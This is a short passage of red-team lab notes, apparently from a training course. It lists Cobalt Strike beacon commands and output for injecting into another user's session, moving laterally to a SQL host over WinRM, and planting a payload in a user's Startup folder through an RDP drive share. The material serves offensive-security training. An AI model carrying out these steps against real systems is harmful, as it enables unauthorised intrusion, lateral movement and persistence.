# Inject to external user session
beacon> inject 4960 x64 tcp-local
[+] established link to child beacon: 10.10.15.90
Now we can enumerate the external domain and access the external machines
beacon> remote-exec winrm sql01.zeropointsecurity.local whoami; hostname
zps\jean.wise
sql01
beacon> jump winrm64 sql01.zeropointsecurity.local pivot-sql-1
[+] established link to child beacon: 10.10.18.221
OR via Shares via RDP
beacon> ls \\tsclient\c
beacon> cd \\tsclient\c\Users\jean.wise\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
beacon> upload C:\Payloads\pivot.exe
beacon> ls